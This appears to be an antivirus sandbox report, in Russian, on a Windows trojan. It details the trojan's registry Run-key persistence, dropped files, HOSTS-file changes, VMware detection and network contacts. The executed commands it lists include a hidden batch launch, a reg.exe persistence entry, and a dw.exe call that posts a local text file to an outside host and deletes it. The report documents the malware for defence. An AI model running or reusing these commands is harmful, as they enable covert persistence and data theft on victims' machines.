Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Instalador do ActiveX' = '%TEMP%\AxInstSV.exe'
Вредоносные функции
Запускает на исполнение
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' "http://redtube.soccer-total.com/ads.php?tp=n&a=user&b=hpwikhbkdyc&d=&e="
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\axinstsv.exe
- %TEMP%\~666f.bat
- %LOCALAPPDATA%\dw.exe
- %TEMP%\t008.vbs
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\~666f.bat
Изменяет файл HOSTS.
Сетевая активность
TCP
Другие
- '34.##9.100.209':443
UDP
- DNS ASK re#####.soccer-total.com
- DNS ASK jv#.###tal-access.com
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\axinstsv.exe'
- '%LOCALAPPDATA%\dw.exe' http://jvm.portal-access.com/ "%TEMP%\user_KB008.txt" /proxy /post /delete
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\~666F.bat" "%TEMP%\AxInstSV.exe" " (со скрытым окном)
- '%WINDIR%\syswow64\ipconfig.exe' /all
- '%WINDIR%\syswow64\find.exe' "VMware"
- '%WINDIR%\syswow64\findstr.exe' "www.linhadefensiva.org" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "Instalador do ActiveX" /t REG_SZ /d "%TEMP%\AxInstSV.exe"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\Temp"\t008.vbs
